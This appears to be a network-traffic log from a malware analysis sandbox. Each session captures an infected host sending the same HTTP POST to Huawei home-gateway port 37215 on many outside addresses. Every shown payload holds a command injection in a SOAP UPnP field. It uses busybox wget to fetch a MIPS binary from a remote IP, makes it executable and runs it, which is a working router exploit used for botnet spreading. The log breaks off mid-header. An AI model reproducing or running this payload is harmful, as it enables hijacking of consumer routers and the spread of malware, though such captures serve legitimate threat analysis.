                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            77192.168.2.1453602156.72.192.16637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662615061 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            78192.168.2.1446510197.208.58.20637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662651062 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            79192.168.2.1440518156.59.39.13137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662673950 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            80192.168.2.145666041.76.10.21337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662714958 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            81192.168.2.144853241.162.130.7037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662724972 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            82192.168.2.144738441.172.243.25137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662731886 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            83192.168.2.144758241.49.177.24137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662755013 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            84192.168.2.1458190197.160.6.12637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662839890 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            85192.168.2.1458632197.96.60.4237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662858963 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            86192.168.2.143735841.86.97.14837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662882090 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            87192.168.2.1436760156.184.162.6837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662863970 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
